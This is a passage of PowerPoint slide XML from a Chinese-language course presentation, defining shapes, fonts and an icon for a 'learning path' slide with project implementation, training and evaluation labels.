              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目实施</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="84" name="Text Placeholder 3"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId5"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13895" y="6880"/>
                <a:ext cx="1600" cy="484"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle>
                <a:defPPr>
                  <a:defRPr lang="zh-CN"/>
                </a:defPPr>
                <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                  <a:spcBef>
                    <a:spcPct val="20000"/>
                  </a:spcBef>
                  <a:buNone/>
                  <a:defRPr sz="2000" b="1" baseline="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="65000"/>
                        <a:lumOff val="35000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  </a:defRPr>
                </a:lvl1pPr>
                <a:lvl2pPr marL="457200" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1200"/>
                </a:lvl2pPr>
                <a:lvl3pPr marL="914400" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="1000"/>
                </a:lvl3pPr>
                <a:lvl4pPr marL="1371600" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl4pPr>
                <a:lvl5pPr marL="1828800" indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl5pPr>
                <a:lvl6pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl6pPr>
                <a:lvl7pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl7pPr>
                <a:lvl8pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl8pPr>
                <a:lvl9pPr indent="0">
                  <a:buNone/>
                  <a:defRPr sz="900"/>
                </a:lvl9pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                  <a:t>项目训练</a:t>
                </a:r>
                <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="86" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="16233" y="2830"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="87" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="88" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="89" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId6"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="90" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr>
                    <p:custDataLst>
                      <p:tags r:id="rId7"/>
                    </p:custDataLst>
                  </p:nvPr>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="91" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr>
                  <p:custDataLst>
                    <p:tags r:id="rId8"/>
                  </p:custDataLst>
                </p:nvPr>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="92" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr>
                <p:custDataLst>
                  <p:tags r:id="rId9"/>
                </p:custDataLst>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Text Placeholder 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId10"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="16635" y="6800"/>
              <a:ext cx="1600" cy="484"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:defPPr>
                <a:defRPr lang="zh-CN"/>
              </a:defPPr>
              <a:lvl1pPr marL="0" indent="0" algn="ctr" defTabSz="1216025">
                <a:spcBef>
                  <a:spcPct val="20000"/>
                </a:spcBef>
                <a:buNone/>
                <a:defRPr sz="2000" b="1" baseline="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="65000"/>
                      <a:lumOff val="35000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:defRPr>
              </a:lvl1pPr>
              <a:lvl2pPr marL="457200" indent="0">
                <a:buNone/>
                <a:defRPr sz="1200"/>
              </a:lvl2pPr>
              <a:lvl3pPr marL="914400" indent="0">
                <a:buNone/>
                <a:defRPr sz="1000"/>
              </a:lvl3pPr>
              <a:lvl4pPr marL="1371600" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl4pPr>
              <a:lvl5pPr marL="1828800" indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl5pPr>
              <a:lvl6pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl6pPr>
              <a:lvl7pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl7pPr>
              <a:lvl8pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl8pPr>
              <a:lvl9pPr indent="0">
                <a:buNone/>
                <a:defRPr sz="900"/>
              </a:lvl9pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
                <a:t>项目评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="文本框 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4505325" y="1420495"/>
            <a:ext cx="2266950" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="lt1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="dk1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学习路径</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5029200" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
